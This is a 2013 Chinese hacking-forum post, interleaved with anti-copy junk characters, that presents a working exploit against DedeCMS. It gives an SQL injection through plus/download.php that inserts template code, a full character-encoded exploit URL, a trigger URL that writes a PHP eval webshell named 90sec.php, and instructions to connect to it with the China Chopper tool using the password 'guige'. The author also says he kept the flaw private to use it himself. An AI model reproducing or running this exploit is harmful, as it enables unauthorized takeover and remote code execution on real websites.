本帖最后由 土豆 于 2013-6-10 14:41 编辑
& w2 b4 ~6 v; y: v" H/ [* T2 k. C# M2 ]6 A
: t7 r/ W) h# I) }作者:鬼哥. M6 W, u8 g l3 Q" I
" n( v6 Y; Q' o! V% t" b2 I4 ~/ }3 b看贴不回,没JJ
5 Z( U, i5 @( o* j9 G8 o/ {9 {9 o( u& a0 E/ h
漏洞大家都知道是哪个。0 p5 E. L- X1 H
) Z$ }1 g1 @( n/ s' x8 j2 L
其实我一直在玩。。郁闷 虽然这个漏洞不是我第一个发现的,以前也是朋友告诉我。$ p, C! J2 B! l( H+ v- }2 T2 B, c
1 J& h2 G4 b$ t5 ~7 X+ d但是没公开。我承认想自己留着玩。。以前这个漏洞应该很多人知道没发出来而已。; p' c. F$ P+ h6 h
4 @! `/ N" ?6 ^
刚看了出的几个exp .. 进后台。还得找后台路径 太麻烦了吧?
- d* t0 e$ _: e* H
9 A. u9 ~5 D @9 T3 y/ a( [2 Xgetshell 很容易 。 既然刚发出来的是 sql方法getshell 我也看到几个人发了sql增加表mytag的内容。9 J& Y: |/ y% m' ^, S2 w( M
; r& P4 E9 T; G+ l) z& ` \但是测试了下。。失败
; o# e/ N: @" q& p$ m% m; y+ B- y1 ~6 A' o3 _3 r9 W0 U, @
原因: 用的语句是update 很多站 mytag 里面都没内容。那么你用update 那有什么用 修改不了任何数据。只能用 INSERT 当然,语句带#就会暴 错误。。现在要做的饶过即可。以前也出过那么多dede sql 结合饶过,成功INSERT。4 q6 i, Z6 c J
* q8 J$ P) [: J4 T3 u* L构造语句:mytag` (aid,expbody,normbody) VALUES(9013,@`\'`,'{dede:php}file_put_contents(''90sec.php'',''<?php eval($_POST[guige]);?>'');{/dede:php}') # @`\'`
/ u7 O4 [6 z [$ J# N9 P u! G" H2 s6 s
EXP:
) s/ v8 k2 G" p8 }( C, D
3 `+ T8 f2 f- @$ Q0 M8 phttp://www.xxx.com/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=109&arrs2[]=121&arrs2[]=116&arrs2[]=97&arrs2[]=103&arrs2[]=96&arrs2[]=32&arrs2[]=40&arrs2[]=97&arrs2[]=105&arrs2[]=100&arrs2[]=44&arrs2[]=101&arrs2[]=120&arrs2[]=112&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=44&arrs2[]=110&arrs2[]=111&arrs2[]=114&arrs2[]=109&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=41&arrs2[]=32&arrs2[]=86&arrs2[]=65&arrs2[]=76&arrs2[]=85&arrs2[]=69&arrs2[]=83&arrs2[]=40&arrs2[]=57&arrs2[]=48&arrs2[]=49&arrs2[]=51&arrs2[]=44&arrs2[]=64&arrs2[]=96&arrs2[]=92&arrs2[]=39&arrs2[]=96&arrs2[]=44&arrs2[]=39&arrs2[]=123&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=102&arrs2[]=105&arrs2[]=108&arrs2[]=101&arrs2[]=95&arrs2[]=112&arrs2[]=117&arrs2[]=116&arrs2[]=95&arrs2[]=99&arrs2[]=111&arrs2[]=110&arrs2[]=116&arrs2[]=101&arrs2[]=110&arrs2[]=116&arrs2[]=115&arrs2[]=40&arrs2[]=39&arrs2[]=39&arrs2[]=57&arrs2[]=48&arrs2[]=115&arrs2[]=101&arrs2[]=99&arrs2[]=46&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=39&arrs2[]=39&arrs2[]=44&arrs2[]=39&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=101&arrs2[]=118&arrs2[]=97&arrs2[]=108&arrs2[]=40&arrs2[]=36&arrs2[]=95&arrs2[]=80&arrs2[]=79&arrs2[]=83&arrs2[]=84&arrs2[]=91&arrs2[]=103&arrs2[]=117&arrs2[]=105&arrs2[]=103&arrs2[]=101&arrs2[]=93&arrs2[]=41&arrs2[]=59&arrs2[]=63&arrs2[]=62&arrs2[]=39&arrs2[]=39&arrs2[]=41&arrs2[]=59&arrs2[]=123&arrs2[]=47&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=39&arrs2[]=41&arrs2[]=32&arrs2[]=35&arrs2[]=32&arrs2[]=64&arrs2[]=96&arrs2[]=92&arrs2[]=39&arrs2[]=96
_( K/ } N y% X m3 a
, V) C) d0 q5 j7 V- M
) q6 p- V; {' F: ?/ h+ T9 d& y成功增加。
" x) D0 n/ |2 n
- ]2 Z3 J& u4 E. [* o访问http://www.xxx.com/plus/mytag_js.php?aid=9013
5 ]6 b6 d$ X9 g( v% l# n生成一句话木马.
6 y8 h4 O* C+ b菜刀连接 http://www.xxx.com/plus/90sec.php 密码 guige
: ?+ @: d6 V2 g' w! K y: ]: }& n2 Q, k! f7 X, W; P
测试OK。
, c0 n# _% e0 b; z; K; ]3 {- y' T1 d2 b0 j
$ A% J6 D" Y+ @ ~: o$ w* z1 e
|
发表于 2013-6-10 16:49:18
收藏
支持
反对